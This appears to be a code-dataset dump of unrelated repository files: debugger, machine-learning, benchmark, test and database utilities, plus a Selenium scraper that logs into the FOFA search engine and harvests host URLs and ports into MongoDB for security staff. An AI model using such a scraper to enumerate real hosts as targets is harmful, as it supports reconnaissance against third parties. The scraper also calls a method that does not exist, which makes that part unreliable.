command_args,
print_on_success=True,
goto_file=False):
""" Run cmd in interpreter and print result (success or failure) on the vim status line. """
(success, output) = self.getCommandResult(command, command_args)
if success:
self.ui.update(self.target, "", self, goto_file)
if len(output) > 0 and print_on_success:
print output
else:
sys.stderr.write(output)
def getCommandOutput(self, command, command_args=""):
""" runs cmd in the command interpreter andreturns (status, result) """
result = lldb.SBCommandReturnObject()
cmd = "%s %s" % (command, command_args)
self.commandInterpreter.HandleCommand(cmd, result)
return (result.Succeeded(), result.GetOutput()
if result.Succeeded() else result.GetError())
def processPendingEvents(self, wait_seconds=0, goto_file=True):
""" Handle any events that are queued from the inferior.
Blocks for at most wait_seconds, or if wait_seconds == 0,
process only events that are already queued.
"""
status = None
num_events_handled = 0
if self.process is not None:
event = lldb.SBEvent()
old_state = self.process.GetState()
new_state = None
done = False
if old_state == lldb.eStateInvalid or old_state == lldb.eStateExited:
# Early-exit if we are in 'boring' states
pass
else:
while not done and self.processListener is not None:
if not self.processListener.PeekAtNextEvent(event):
if wait_seconds > 0:
# No events on the queue, but we are allowed to wait for wait_seconds
# for any events to show up.
self.processListener.WaitForEvent(
wait_seconds, event)
new_state = lldb.SBProcess.GetStateFromEvent(event)
num_events_handled += 1
done = not self.processListener.PeekAtNextEvent(event)
else:
# An event is on the queue, process it here.
self.processListener.GetNextEvent(event)
new_state = lldb.SBProcess.GetStateFromEvent(event)
# continue if stopped after attaching
if old_state == lldb.eStateAttaching and new_state == lldb.eStateStopped:
self.process.Continue()
# If needed, perform any event-specific behaviour here
num_events_handled += 1
if num_events_handled == 0:
pass
else:
if old_state == new_state:
status = ""
self.ui.update(self.target, status, self, goto_file)
def returnCompleteCommand(a, l, p):
""" Returns a "\n"-separated string with possible completion results
for command a with length l and cursor at p.
"""
separator = "\n"
results = ctrl.completeCommand(a, l, p)
vim.command('return "%s%s"' % (separator.join(results), separator))
def returnCompleteWindow(a, l, p):
""" Returns a "\n"-separated string with possible completion results
for commands that expect a window name parameter (like hide/show).
FIXME: connect to ctrl.ui instead of hardcoding the list here
"""
separator = "\n"
results = [
'breakpoints',
'backtrace',
'disassembly',
'locals',
'threads',
'registers']
vim.command('return "%s%s"' % (separator.join(results), separator))
global ctrl
ctrl = LLDBController()
|
openproblems/api/load.py
|
dburkhardt/SingleCellOpenProblems
| 134 |
67087
|
<filename>openproblems/api/load.py
from . import utils
def load_dataset(task_name, function_name, test):
"""Load a dataset for a task."""
fun = utils.get_function(task_name, "datasets", function_name)
return fun(test=test)
def main(args):
"""Run the ``load`` subcommand."""
adata = load_dataset(args.task, args.name, args.test)
adata.write_h5ad(args.output)
|
src/lib/detectors/ddd.py
|
nerminsamet/houghnet
| 161 |
67088
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
import numpy as np
from progress.bar import Bar
import time
import torch
from src.lib.external.nms import soft_nms
from src.lib.models.decode import ddd_decode
from src.lib.models.utils import flip_tensor
from src.lib.utils.image import get_affine_transform
from src.lib.utils.post_process import ddd_post_process
from src.lib.utils.debugger import Debugger
from src.lib.utils.ddd_utils import compute_box_3d, project_to_image, alpha2rot_y
from src.lib.utils.ddd_utils import draw_box_3d, unproject_2d_to_3d
from .base_detector import BaseDetector
class DddDetector(BaseDetector):
def __init__(self, opt):
super(DddDetector, self).__init__(opt)
self.calib = np.array([[707.0493, 0, 604.0814, 45.75831],
[0, 707.0493, 180.5066, -0.3454157],
[0, 0, 1., 0.004981016]], dtype=np.float32)
def pre_process(self, image, scale, calib=None):
height, width = image.shape[0:2]
inp_height, inp_width = self.opt.input_h, self.opt.input_w
c = np.array([width / 2, height / 2], dtype=np.float32)
if self.opt.keep_res:
s = np.array([inp_width, inp_height], dtype=np.int32)
else:
s = np.array([width, height], dtype=np.int32)
trans_input = get_affine_transform(c, s, 0, [inp_width, inp_height])
resized_image = image #cv2.resize(image, (width, height))
inp_image = cv2.warpAffine(
resized_image, trans_input, (inp_width, inp_height),
flags=cv2.INTER_LINEAR)
inp_image = (inp_image.astype(np.float32) / 255.)
inp_image = (inp_image - self.mean) / self.std
images = inp_image.transpose(2, 0, 1)[np.newaxis, ...]
calib = np.array(calib, dtype=np.float32) if calib is not None \
else self.calib
images = torch.from_numpy(images)
meta = {'c': c, 's': s,
'out_height': inp_height // self.opt.down_ratio,
'out_width': inp_width // self.opt.down_ratio,
'calib': calib}
return images, meta
def process(self, images, return_time=False):
with torch.no_grad():
torch.cuda.synchronize()
output = self.model(images)[-1]
output['hm'] = output['hm'].sigmoid_()
output['dep'] = 1. / (output['dep'].sigmoid() + 1e-6) - 1.
wh = output['wh'] if self.opt.reg_bbox else None
reg = output['reg'] if self.opt.reg_offset else None
torch.cuda.synchronize()
forward_time = time.time()
dets = ddd_decode(output['hm'], output['rot'], output['dep'],
output['dim'], wh=wh, reg=reg, K=self.opt.K)
if return_time:
return output, dets, forward_time
else:
return output, dets
def post_process(self, dets, meta, scale=1):
dets = dets.detach().cpu().numpy()
detections = ddd_post_process(
dets.copy(), [meta['c']], [meta['s']], [meta['calib']], self.opt)
self.this_calib = meta['calib']
return detections[0]
def merge_outputs(self, detections):
results = detections[0]
for j in range(1, self.num_classes + 1):
if len(results[j] > 0):
keep_inds = (results[j][:, -1] > self.opt.peak_thresh)
results[j] = results[j][keep_inds]
return results
def debug(self, debugger, images, dets, output, scale=1):
dets = dets.detach().cpu().numpy()
img = images[0].detach().cpu().numpy().transpose(1, 2, 0)
img = ((img * self.std + self.mean) * 255).astype(np.uint8)
pred = debugger.gen_colormap(output['hm'][0].detach().cpu().numpy())
debugger.add_blend_img(img, pred, 'pred_hm')
debugger.add_ct_detection(
img, dets[0], show_box=self.opt.reg_bbox,
center_thresh=self.opt.vis_thresh, img_id='det_pred')
def show_results(self, debugger, image, results):
debugger.add_3d_detection(
image, results, self.this_calib,
center_thresh=self.opt.vis_thresh, img_id='add_pred')
debugger.add_bird_view(
results, center_thresh=self.opt.vis_thresh, img_id='bird_pred')
debugger.show_all_imgs(pause=self.pause)
|
docs/conch/benchmarks/buffering_mixin.py
|
Khymeira/twisted
| 4,612 |
67090
|
<gh_stars>1000+
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Benchmarks comparing the write performance of a "normal" Protocol instance
and an instance of a Protocol class which has had L{twisted.conch.mixin}'s
L{BufferingMixin<twisted.conch.mixin.BufferingMixin>} mixed in to perform
Nagle-like write coalescing.
"""
from pprint import pprint
from sys import stdout
from time import time
from twisted.conch.mixin import BufferingMixin
from twisted.internet import reactor
from twisted.internet.defer import Deferred
from twisted.internet.protocol import ClientCreator, Protocol, ServerFactory
from twisted.python.log import startLogging
from twisted.python.usage import Options
class BufferingBenchmark(Options):
"""
Options for configuring the execution parameters of a benchmark run.
"""
optParameters = [
(
"scale",
"s",
"1",
"Work multiplier (bigger takes longer, might resist noise better)",
)
]
def postOptions(self):
self["scale"] = int(self["scale"])
class ServerProtocol(Protocol):
"""
A silent protocol which only waits for a particular amount of input and
then fires a Deferred.
"""
def __init__(self, expected, finished):
self.expected = expected
self.finished = finished
def dataReceived(self, bytes):
self.expected -= len(bytes)
if self.expected == 0:
finished, self.finished = self.finished, None
finished.callback(None)
class BufferingProtocol(Protocol, BufferingMixin):
"""
A protocol which uses the buffering mixin to provide a write method.
"""
class UnbufferingProtocol(Protocol):
"""
A protocol which provides a naive write method which simply passes through
to the transport.
"""
def connectionMade(self):
"""
Bind write to the transport's write method and flush to a no-op
function in order to provide the same API as is provided by
BufferingProtocol.
"""
self.write = self.transport.write
self.flush = lambda: None
def _write(proto, byteCount):
write = proto.write
flush = proto.flush
for i in range(byteCount):
write("x")
flush()
def _benchmark(byteCount, clientProtocol):
result = {}
finished = Deferred()
def cbFinished(ignored):
result["disconnected"] = time()
result["duration"] = result["disconnected"] - result["connected"]
return result
finished.addCallback(cbFinished)
f = ServerFactory()
f.protocol = lambda: ServerProtocol(byteCount, finished)
server = reactor.listenTCP(0, f)
f2 = ClientCreator(reactor, clientProtocol)
proto = f2.connectTCP("127.0.0.1", server.getHost().port)
def connected(proto):
result["connected"] = time()
return proto
proto.addCallback(connected)
proto.addCallback(_write, byteCount)
return finished
def _benchmarkBuffered(byteCount):
return _benchmark(byteCount, BufferingProtocol)
def _benchmarkUnbuffered(byteCount):
return _benchmark(byteCount, UnbufferingProtocol)
def benchmark(scale=1):
"""
Benchmark and return information regarding the relative performance of a
protocol which does not use the buffering mixin and a protocol which
does.
@type scale: C{int}
@param scale: A multiplier to the amount of work to perform
@return: A Deferred which will fire with a dictionary mapping each of
the two unicode strings C{u'buffered'} and C{u'unbuffered'} to
dictionaries describing the performance of a protocol of each type.
These value dictionaries will map the unicode strings C{u'connected'}
and C{u'disconnected'} to the times at which each of those events
occurred and C{u'duration'} two the difference between these two values.
"""
overallResult = {}
byteCount = 1024
bufferedDeferred = _benchmarkBuffered(byteCount * scale)
def didBuffered(bufferedResult):
overallResult["buffered"] = bufferedResult
unbufferedDeferred = _benchmarkUnbuffered(byteCount * scale)
def didUnbuffered(unbufferedResult):
overallResult["unbuffered"] = unbufferedResult
return overallResult
unbufferedDeferred.addCallback(didUnbuffered)
return unbufferedDeferred
bufferedDeferred.addCallback(didBuffered)
return bufferedDeferred
def main(args=None):
"""
Perform a single benchmark run, starting and stopping the reactor and
logging system as necessary.
"""
startLogging(stdout)
options = BufferingBenchmark()
options.parseOptions(args)
d = benchmark(options["scale"])
def cbBenchmark(result):
pprint(result)
def ebBenchmark(err):
print(err.getTraceback())
d.addCallbacks(cbBenchmark, ebBenchmark)
def stopReactor(ign):
reactor.stop()
d.addBoth(stopReactor)
reactor.run()
if __name__ == "__main__":
main()
|
show-adapt-tell/pretrain_CNN_D.py
|
tsenghungchen/show-adapt-and-tell
| 166 |
67110
|
<gh_stars>100-1000
from __future__ import division
import os
import time
import tensorflow as tf
import numpy as np
from tqdm import tqdm
from highway import *
import pdb
class D_pretrained():
def __init__(self, sess, dataset, negative_dataset, D_info, conf=None, l2_reg_lambda=0.2):
self.sess = sess
self.batch_size = conf.batch_size
self.max_iter = conf.max_iter
self.num_train = dataset.num_train
self.hidden_size = conf.D_hidden_size # 512
self.dict_size = dataset.dict_size
self.max_words = dataset.max_words
self.dataset = dataset
self.negative_dataset = negative_dataset
self.checkpoint_dir = conf.checkpoint_dir
self.global_step = tf.get_variable('global_step', [],initializer=tf.constant_initializer(0), trainable=False)
self.optim = tf.train.AdamOptimizer(conf.learning_rate)
self.filter_sizes = D_info['filter_sizes']
self.num_filters = D_info['num_filters']
self.num_filters_total = sum(self.num_filters)
self.num_classes = D_info['num_classes']
self.l2_reg_lambda = l2_reg_lambda
self.START = self.dataset.word2ix[u'<BOS>']
self.END = self.dataset.word2ix[u'<EOS>']
self.UNK = self.dataset.word2ix[u'<UNK>']
self.NOT = self.dataset.word2ix[u'<NOT>']
# placeholder
self.text = tf.placeholder(tf.int32, [None, self.max_words], name="text")
self.label = tf.placeholder(tf.float32, [None, self.num_classes], name="label")
self.images = tf.placeholder(tf.float32, [None, self.dataset.img_dims], name="images")
self.loss, self.pred = self.build_Discriminator(self.images, self.text, self.label, name='D')
self.loss_sum = tf.scalar_summary("loss", self.loss)
params = tf.trainable_variables()
self.D_params_dict = {}
self.D_params_train = []
for param in params:
self.D_params_dict.update({param.name:param})
if "embedding" in param.name:
embedding_matrix = np.load("embedding-42000.npy")
self.embedding_assign_op = param.assign(tf.Variable(embedding_matrix, trainable=False))
else:
self.D_params_train.append(param)
def build_Discriminator(self, images, text, label, name="discriminator", reuse=False):
### sentence: B, S
hidden_size = self.hidden_size
random_uniform_init = tf.random_uniform_initializer(minval=-0.1, maxval=0.1)
with tf.variable_scope(name):
if reuse:
tf.get_variable_scope().reuse_variables()
with tf.device('/cpu:0'), tf.variable_scope("embedding"):
word_emb_W = tf.get_variable("word_emb_W", [self.dict_size, hidden_size], "float32", random_uniform_init)
embedded_chars = tf.nn.embedding_lookup(word_emb_W, text) # B,S,H
embedded_chars_expanded = tf.expand_dims(embedded_chars, -1) # B,S,H,1
with tf.variable_scope("output"):
output_W = tf.get_variable("output_W", [hidden_size, self.num_classes],
"float32", random_uniform_init)
output_b = tf.get_variable("output_b", [self.num_classes], "float32", random_uniform_init)
with tf.variable_scope("images"):
images_W = tf.get_variable("images_W", [self.dataset.img_dims, hidden_size],
"float32", random_uniform_init)
images_b = tf.get_variable("images_b", [hidden_size], "float32", random_uniform_init)
with tf.variable_scope("text"):
text_W = tf.get_variable("text_W", [self.num_filters_total, hidden_size],
"float32", random_uniform_init)
text_b = tf.get_variable("text_b", [hidden_size], "float32", random_uniform_init)
# Create a convolution + maxpool layer for each filter size
pooled_outputs = []
# Keeping track of l2 regularization loss (optional)
l2_loss = tf.constant(0.0)
for filter_size, num_filter in zip(self.filter_sizes, self.num_filters):
with tf.variable_scope("conv-maxpool-%s" % filter_size):
# Convolution Layer
filter_shape = [filter_size, hidden_size, 1, num_filter]
W = tf.get_variable("W", filter_shape, "float32", random_uniform_init)
b = tf.get_variable("b", [num_filter], "float32", random_uniform_init)
conv = tf.nn.conv2d(
embedded_chars_expanded,
W,
strides=[1, 1, 1, 1],
padding="VALID",
name="conv")
# Apply nonlinearity
h = tf.nn.relu(tf.nn.bias_add(conv, b), name="relu")
# Maxpooling over the outputs
pooled = tf.nn.max_pool(
h,
ksize=[1, self.max_words - filter_size + 1, 1, 1],
strides=[1, 1, 1, 1],
padding='VALID',
name="pool")
pooled_outputs.append(pooled)
h_pool = tf.concat(3, pooled_outputs) # B,1,1,total filters
h_pool_flat = tf.reshape(h_pool, [-1, self.num_filters_total]) # b, total filters
# Add highway
with tf.variable_scope("highway"):
h_highway = highway(h_pool_flat, h_pool_flat.get_shape()[1], 1, 0)
with tf.variable_scope("text"):
text_emb = tf.nn.xw_plus_b(h_highway, text_W, text_b, name="text_emb")
with tf.variable_scope("images"):
images_emb = tf.nn.xw_plus_b(images, images_W, images_b, name="images_emb")
with tf.variable_scope("output"):
fusing_vec = tf.mul(text_emb, images_emb)
l2_loss += tf.nn.l2_loss(output_W)
l2_loss += tf.nn.l2_loss(output_b)
logits = tf.nn.xw_plus_b(fusing_vec, output_W, output_b, name="logits")
ypred_for_auc = tf.nn.softmax(logits)
predictions = tf.argmax(logits, 1, name="predictions")
#predictions = tf.nn.sigmoid(logits, name="predictions")
# Calculate Mean cross-entropy loss
with tf.variable_scope("loss"):
losses = tf.nn.softmax_cross_entropy_with_logits(logits, label)
#losses = tf.nn.sigmoid_cross_entropy_with_logits(tf.squeeze(logits), self.input_y)
loss = tf.reduce_mean(losses) + self.l2_reg_lambda * l2_loss
return loss, predictions
def train(self):
self.train_op = self.optim.minimize(self.loss, global_step=self.global_step, var_list=self.D_params_train)
#self.train_op = self.optim.minimize(self.loss, global_step=self.global_step)
self.writer = tf.train.SummaryWriter("./logs/D_CNN_pretrained_sample", self.sess.graph)
tf.initialize_all_variables().run()
self.saver = tf.train.Saver(var_list=self.D_params_dict, max_to_keep=30)
# assign the G matrix to D pretrain
self.sess.run(self.embedding_assign_op)
count = 0
for idx in range(self.max_iter//3000):
self.save(self.checkpoint_dir, count)
self.evaluate('test', count)
self.evaluate('train', count)
for k in tqdm(range(3000)):
right_images, right_text, _ = self.dataset.sequential_sample(self.batch_size)
fake_images, fake_text, _ = self.negative_dataset.sequential_sample(self.batch_size)
wrong_text = self.dataset.get_wrong_text(self.batch_size)
images = np.concatenate((right_images, right_images, fake_images), axis=0)
text = np.concatenate((right_text, wrong_text, fake_text.astype('int32')), axis=0)
label = np.zeros((text.shape[0], self.num_classes))
# right -> first entry
# wrong -> second entry
# fake -> third entry
label[:self.batch_size, 0] = 1
label[self.batch_size:2*self.batch_size, 1] = 1
label[2*self.batch_size:, 2] = 1
_, loss, summary_str = self.sess.run([self.train_op, self.loss, self.loss_sum],{
self.text: text.astype('int32'),
self.images: images,
self.label: label
})
self.writer.add_summary(summary_str, count)
count += 1
def evaluate(self, split, count):
if split == 'test':
num_test_pair = -1
elif split == 'train':
num_test_pair = 5000
right_images, right_text, _ = self.dataset.get_paired_data(num_test_pair, phase=split)
# the true paired data we get
num_test_pair = len(right_images)
fake_images, fake_text, _ = self.negative_dataset.get_paired_data(num_test_pair, phase=split)
random_idx = range(num_test_pair)
np.random.shuffle(random_idx)
wrong_text = np.squeeze(right_text[random_idx, :])
count = 0.
loss_t = []
right_acc_t = []
wrong_acc_t = []
fake_acc_t = []
for i in range(num_test_pair//self.batch_size):
right_images_batch = right_images[i*self.batch_size:(i+1)*self.batch_size,:]
fake_images_batch = fake_images[i*self.batch_size:(i+1)*self.batch_size,:]
right_text_batch = right_text[i*self.batch_size:(i+1)*self.batch_size,:]
fake_text_batch = fake_text[i*self.batch_size:(i+1)*self.batch_size,:]
wrong_text_batch = wrong_text[i*self.batch_size:(i+1)*self.batch_size,:]
text_batch = np.concatenate((right_text_batch, wrong_text_batch, fake_text_batch.astype('int32')), axis=0)
images_batch = np.concatenate((right_images_batch, right_images_batch, fake_images_batch), axis=0)
label = np.zeros((text_batch.shape[0], self.num_classes))
# right -> first entry
# wrong -> second entry
# fake -> third entry
label[:self.batch_size, 0] = 1
label[self.batch_size:2*self.batch_size, 1] = 1
label[2*self.batch_size:, 2] = 1
feed_dict = {self.images:images_batch, self.text:text_batch, self.label:label}
loss, pred, loss_str = self.sess.run([self.loss, self.pred, self.loss_sum], feed_dict)
loss_t.append(loss)
right_acc_t.append(np.sum((np.argmax(label[:self.batch_size],1)==pred[:self.batch_size])+0))
wrong_acc_t.append(np.sum((np.argmax(label[self.batch_size:2*self.batch_size],1)==pred[self.batch_size:2*self.batch_size])+0))
fake_acc_t.append(np.sum((np.argmax(label[2*self.batch_size:],1)==pred[2*self.batch_size:])+0))
count += self.batch_size
print "Phase =", split.capitalize()
print "======================= Loss ====================="
print '[$] Loss =', np.mean(loss_t)
print "======================= Acc ======================"
print '[$] Right Pair Acc. =', sum(right_acc_t)/count
print '[$] Wrong Pair Acc. =', sum(wrong_acc_t)/count
print '[$] Fake Pair Acc. =', sum(fake_acc_t)/count
def save(self, checkpoint_dir, step):
model_name = "D_Pretrained"
model_dir = "%s" % (self.dataset.dataset_name)
checkpoint_dir = os.path.join(checkpoint_dir, model_dir, "D_CNN_pretrained_sample")
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
self.saver.save(self.sess,
os.path.join(checkpoint_dir, model_name),
global_step=step)
def load(self, checkpoint_dir):
print(" [*] Reading checkpoints...")
model_dir = "%s" % (self.dataset.dataset_name)
checkpoint_dir = os.path.join(checkpoint_dir, model_dir)
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
return True
else:
return False
|
content/test/gpu/gpu_tests/maps.py
|
iplo/Chain
| 231 |
67114
|
<filename>content/test/gpu/gpu_tests/maps.py<gh_stars>100-1000
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs a Google Maps pixel test.
Performs several common navigation actions on the map (pan, zoom, rotate) then
captures a screenshot and compares selected pixels against expected values"""
import json
import optparse
import os
import cloud_storage_test_base
import maps_expectations
from telemetry import test
from telemetry.core import bitmap
from telemetry.core import util
from telemetry.page import page_test
from telemetry.page import page_set
class MapsValidator(cloud_storage_test_base.ValidatorBase):
def __init__(self):
super(MapsValidator, self).__init__('ValidatePage')
def CustomizeBrowserOptions(self, options):
options.AppendExtraBrowserArgs('--enable-gpu-benchmarking')
def ValidatePage(self, page, tab, results):
# TODO: This should not be necessary, but it's not clear if the test is
# failing on the bots in it's absence. Remove once we can verify that it's
# safe to do so.
MapsValidator.SpinWaitOnRAF(tab, 3)
if not tab.screenshot_supported:
raise page_test.Failure('Browser does not support screenshot capture')
screenshot = tab.Screenshot(5)
if not screenshot:
raise page_test.Failure('Could not capture screenshot')
dpr = tab.EvaluateJavaScript('window.devicePixelRatio')
expected = self._ReadPixelExpectations(page)
try:
self._CompareToExpectations(screenshot, expected, dpr)
except page_test.Failure:
image_name = self._UrlToImageName(page.display_name)
if self.options.test_machine_name:
self._UploadErrorImagesToCloudStorage(image_name, screenshot, None)
else:
self._WriteErrorImages(self.options.generated_dir, image_name,
screenshot, None)
raise
@staticmethod
def SpinWaitOnRAF(tab, iterations, timeout = 60):
waitScript = r"""
window.__spinWaitOnRAFDone = false;
var iterationsLeft = %d;
function spin() {
iterationsLeft--;
if (iterationsLeft == 0) {
window.__spinWaitOnRAFDone = true;
return;
}
window.requestAnimationFrame(spin);
}
window.requestAnimationFrame(spin);
""" % iterations
def IsWaitComplete():
return tab.EvaluateJavaScript('window.__spinWaitOnRAFDone')
tab.ExecuteJavaScript(waitScript)
util.WaitFor(IsWaitComplete, timeout)
def _ReadPixelExpectations(self, page):
expectations_path = os.path.join(page._base_dir, page.pixel_expectations)
with open(expectations_path, 'r') as f:
json_contents = json.load(f)
return json_contents
def _CompareToExpectations(self, screenshot, expectations, devicePixelRatio):
for expectation in expectations:
location = expectation["location"]
x = location[0] * devicePixelRatio
y = location[1] * devicePixelRatio
if x < 0 or y < 0 or x > screenshot.width or y > screenshot.height:
raise page_test.Failure(
'Expected pixel location [%d, %d] is out of range on [%d, %d] image' %
(x, y, screenshot.width, screenshot.height))
pixel_color = screenshot.GetPixelColor(x, y)
expect_color = bitmap.RgbaColor(
expectation["color"][0],
expectation["color"][1],
expectation["color"][2])
iter_result = pixel_color.IsEqual(expect_color, expectation["tolerance"])
if not iter_result:
raise page_test.Failure('Expected pixel at ' + str(location) +
' to be ' +
str(expectation["color"]) + " but got [" +
str(pixel_color.r) + ", " +
str(pixel_color.g) + ", " +
str(pixel_color.b) + "]")
class Maps(cloud_storage_test_base.TestBase):
"""Google Maps pixel tests."""
test = MapsValidator
@staticmethod
def AddTestCommandLineOptions(parser):
group = optparse.OptionGroup(parser, 'Maps test options')
cloud_storage_test_base.TestBase._AddTestCommandLineOptions(parser, group)
parser.add_option_group(group)
def CreateExpectations(self, page_set):
return maps_expectations.MapsExpectations()
def CreatePageSet(self, options):
page_set_path = os.path.join(
util.GetChromiumSrcDir(), 'content', 'test', 'gpu', 'page_sets')
page_set_dict = {
'archive_data_file': 'data/maps.json',
'make_javascript_deterministic': False,
'pages': [
{
'name': 'Maps.maps_001',
'url': 'http://localhost:10020/tracker.html',
# TODO: Hack to prevent maps from scaling due to window size.
# Remove when the maps team provides a better way of overriding this
# behavior
'script_to_evaluate_on_commit': 'window.screen = null;',
'navigate_steps': [
{ 'action': 'navigate' },
{ 'action': 'wait', 'javascript': 'window.testDone' }
],
'pixel_expectations': 'data/maps_001_expectations.json'
}
]
}
return page_set.PageSet.FromDict(page_set_dict, page_set_path)
|
python/runtime/dbapi/__init__.py
|
hebafer/sqlflow
| 4,742 |
67119
|
# Copyright 2020 The SQLFlow Authors. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
# NOTE(sneaxiy): do not import the XxxConnection object outside the
# following method. It is because those imports are quite slow (about 1-2s),
# making that the normal SQL statement runs very slow.
def get_connection_object(driver):
if driver == "mysql":
from runtime.dbapi.mysql import MySQLConnection
return MySQLConnection
elif driver == "hive":
from runtime.dbapi.hive import HiveConnection
return HiveConnection
elif driver == "maxcompute":
from runtime.dbapi.maxcompute import MaxComputeConnection
return MaxComputeConnection
elif driver == "paiio":
from runtime.dbapi.paiio import PaiIOConnection
return PaiIOConnection
else:
raise ValueError("unsupported driver type %s" % driver)
def connect(uri):
"""Connect to given uri
Params:
uri: a valid URI string
Returns:
A Connection object
Raises:
ValueError if the uri is not valid or can't find given driver
"""
parts = uri.split("://")
if len(parts) < 2:
raise ValueError("Input should be a valid uri.", uri)
return get_connection_object(parts[0])(uri)
|
OthertCrawler/0x08fofa/Fofa_spider.py
|
wangbl11/ECommerceCrawlers
| 3,469 |
67120
|
<gh_stars>1000+
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
__author__ = 'AJay'
__mtime__ = '2019/5/13 0013'
"""
import base64
import random
import time
import pymongo
from pyquery import PyQuery as pq
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
class Fofa():
def __init__(self,config):
self.WRITE_MODE = config[
'write_mode'] # 结果信息保存类型,为list形式,可包含txt、csv、json、mongo和mysql五种类型
self.FOFA_USERNAME =config['fofa_username'] # fofa账号用户名
self.FOFA_PASSWORD = config['fofa_password'] # fofa账号密码
self.PAGE = config['page']
self.MONGO_URL = 'localhost'
self.MONGO_DB = 'fofa'
self.MONGO_TABLE = 'message'
self._init_db()
self._init_browser()
def _init_db(self):
# 连接mongodb数据库
client = pymongo.MongoClient(self.MONGO_URL)
self.db = client[self.MONGO_DB]
def _init_browser(self):
# 初始化浏览器
self.browser = webdriver.Chrome(service_args=['--load-images=false', '--disk-cache=true'])
self.wait = WebDriverWait(self.browser, 10)
self.browser.set_window_size(1400, 900)
def login_fofa(self):
try:
self.browser.get('https://i.nosec.org/login?service=https%3A%2F%2Ffofa.so%2Fusers%2Fservice')
input_user = self.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, '#username')))
input_pass = self.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, '#password')))
submit = self.wait.until(EC.element_to_be_clickable(
(By.CSS_SELECTOR, '#login-form > table > tbody > tr:nth-child(4) > td > button')))
input_user.send_keys(self.FOFA_USERNAME)
input_pass.send_keys(self.FOFA_PASSWORD)
submit.click()
self.browser.implicitly_wait(30)
except TimeoutException:
return self.login_fofa()
def turn_to_start_page(self):
qbase = base64.b64encode(self.q.encode(encoding="utf-8"))
starturl = 'https://fofa.so/result?page={}&qbase64={}#will_page'.format(self.now_page, str(qbase, 'utf-8'))
self.browser.get(url=starturl)
# 翻页操作
def next_page(self):
try:
submit_next = self.wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR, '#will_page > a.next_page')))
self.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, '#ajax_content')))
self.get_products()
submit_next.click()
# wait.until(EC.text_to_be_present_in_element((By.CSS_SELECTOR,'#will_page > em'),str(page_number))) # 很慢的
except TimeoutException:
print('循环下一页')
return self.next_page()
# 获取数据
def get_products(self):
try:
self.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, '#ajax_content')))
except Exception as e:
self.turn_to_start_page()
# browser.implicitly_wait(30)
html = self.browser.page_source
doc = pq(html)
items = doc('.list_main .list_mod_all #ajax_content .download_loader .list_mod').items()
for item in items:
product = {
'url': item.find('.list_mod_t').text(),
'info': item.find('.list_mod_c .row .col-lg-4 .list_sx1').text(),
'flag': 0,
'type': '博彩'
}
print(product)
self.save_to_mongo(product)
# # 保存格式为https:http ip port 任意组合形式 可以任意修改 现阶段为 http://domain:80 https://domain:443 domain:3389
# url= item.find('.list_mod_t').text()
# url_list = url.split('\n')
# domain=url_list[0]
# port = url_list[1]
# if port=='80':
# domain='http://'+domain
# result = domain+':'+port+'\n'
# self.save_text(result)
def save_to_txt(self,result):
# 应安全人员要求保存txt形式
with open ('result.txt','a+')as f:
f.write(result+'\n')
pass
# 存储到mongodb
def save_to_mongo(self, result):
try:
if self.db[self.MONGO_TABLE].insert(result):
pass
# print('sucess', result)
except Exception:
print('faild', result)
def main(self, q):
self.login_fofa()
self.q = q
# search(str1)
self.now_page = 1
self.turn_to_start_page()
for i in range(self.now_page, int(self.PAGE)):
print('第多少页', i)
self.now_page = i
self.next_page()
time.sleep(random.randint(3, 6))
self.browser.quit()
import os
import sys
import json
def main():
try:
config_path = os.path.split(
os.path.realpath(__file__))[0] + os.sep + 'config.json'
if not os.path.isfile(config_path):
sys.exit(u'当前路径:%s 不存在配置文件config.json' %
(os.path.split(os.path.realpath(__file__))[0] + os.sep))
with open(config_path) as f:
try:
config = json.loads(f.read())
except ValueError:
sys.exit(u'config.json 格式不正确,请参考 ')
fofa = Fofa(config)
fofa.start() # 爬取fofa信息
except Exception as e:
print('Error: ', e)
if __name__ == '__main__':
main()
|
examples/hlapi/v3arch/asyncore/sync/manager/cmdgen/preload-pysnmp-mibs.py
|
flaviut/pysnmp
| 492 |
67137
|
"""
Preload PySNMP MIBs
+++++++++++++++++++
Send a series of SNMP GETNEXT requests using the following options:
* with SNMPv3 with user 'usr-md5-des', MD5 auth and DES privacy protocols
* over IPv4/UDP
* to an Agent at demo.snmplabs.com:161
* for all OIDs starting from 1.3.6
* preload all Python MIB modules found in search path
Functionally similar to:
| $ snmpwalk -v3 -l authPriv -u usr-md5-des -A authkey1 -X privkey1 -m ALL demo.snmplabs.com:161 1.3.6
"""#
from pysnmp.hlapi import *
iterator = nextCmd(
SnmpEngine(),
UsmUserData('usr-md5-des', 'authkey1', 'privkey1'),
UdpTransportTarget(('demo.snmplabs.com', 161)),
ContextData(),
ObjectType(ObjectIdentity('1.3.6').loadMibs())
)
for errorIndication, errorStatus, errorIndex, varBinds in iterator:
if errorIndication:
print(errorIndication)
break
elif errorStatus:
print('%s at %s' % (errorStatus.prettyPrint(),
errorIndex and varBinds[int(errorIndex) - 1][0] or '?'))
break
else:
for varBind in varBinds:
print(' = '.join([x.prettyPrint() for x in varBind]))
|
utime/hypnogram/__init__.py
|
aluquecerp/U-Time
| 138 |
